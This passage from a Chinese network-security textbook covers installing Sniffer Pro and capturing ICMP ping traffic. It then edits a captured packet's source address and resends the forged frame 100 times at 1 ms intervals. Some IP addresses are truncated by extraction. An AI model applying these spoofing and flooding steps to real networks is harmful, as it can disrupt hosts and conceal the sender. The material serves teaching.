52、地址（Address）、所在城市（City）、州/?。⊿tate）、國家（Country）、郵政 編碼（Postal Code）和電話號碼（Phone）以及傳真（Fax），輸入完畢后點擊 Next 繼續(xù)。 圖 8-7 Sniffer pro 安裝向導 7、輸入序列號，然后點擊 Next 繼續(xù)。圖 8-8 Sniffer pro 安裝向導 8、接著需要通過因特網與 NAI聯系進行注冊，有三種方式 1）選擇與因特網直連，直接進 行注冊；2）通過代理與因特網連接，此時需要設置代理參數；3）沒有與與因特網連接，需 要通過傳真注冊；一般情況可選擇選項1。 圖 8-9 Sniffer pro 安裝向導 9

53、、軟件與 NAI 服務器連接上，就會注冊，并提供一個客戶號，點擊 Next 就會出現注冊成 功的信息。 圖 8-10 Sniffer pro 安裝向導 10、 點擊 Finish完成。 安裝軟件會通知如果運行 Sniffer pro 必須有微軟的IE5 或更高版本， 并且安裝微軟的 JAVA虛擬機。 二、工具欄的使用 具體操作見 5.1 節(jié)內容 三、捕獲欄的使用，使用 Sniffer Pro捕獲 ICMP 流量。 1、點擊定義過濾器按鈕，單擊配置文件（Profiles）按鈕，新建（New）一個配置文件，取 名為 ICMP,如下圖：圖 8-11 Sniffer pro過濾器定義 2、點完成（Do

54、ne）后，在屏幕右側選擇 ICMP，然后點擊高級（Advance）按鈕，進入高級 選項卡，因為我們只需要監(jiān)聽ICMP 報文，所以選中 IP 下的 ICMP協議，如下圖： 圖 8-12 Sniffer pro 過濾器協議定義 3、點擊確定，完成定義過濾器。選擇 ICMP 過濾器，進行監(jiān)聽，點擊開始按鈕。圖 8-13 Sniffer pro 捕獲高級系統(tǒng) 4、 在本地主機 （IP： 53） 利用 Ping 命令測試與相鄰主機 （IP： 8） 的連通性。當捕獲到 ICMP 報文時，點擊停止并顯示按鈕，點擊視圖下方的解碼（Decode） 選項，如下圖：

55、圖 8-14 Sniffer pro 解碼 5、可以發(fā)現監(jiān)聽到的 ICMP Echo Request 回送請求，源地址（Source Address）： 53 目的地址（Destination Address）：8。 四、報文的發(fā)送 1、在解碼卷標中，在“總結”選項中選中捕獲的 ICMP 報文，點擊“HEX”部分，點擊鼠標 右鍵，選擇編輯（Edit）修改源地址（Source Address）為 55。 圖 8-15 Sniffer pro 十六進制代碼編輯 2、點擊重新插入（Re-interpret），此時在“HEX”部分的源地址（Source Address）就發(fā)生 了變化。然后點擊鼠標右鍵，選擇發(fā)送當前報文（Sent Current Frame）。圖 8-16 Sniffer pro 編碼發(fā)送 3、發(fā)送次數為（Times）為 100 次，延遲（Delay）為 1 毫秒，點擊確定。如果將選中連續(xù)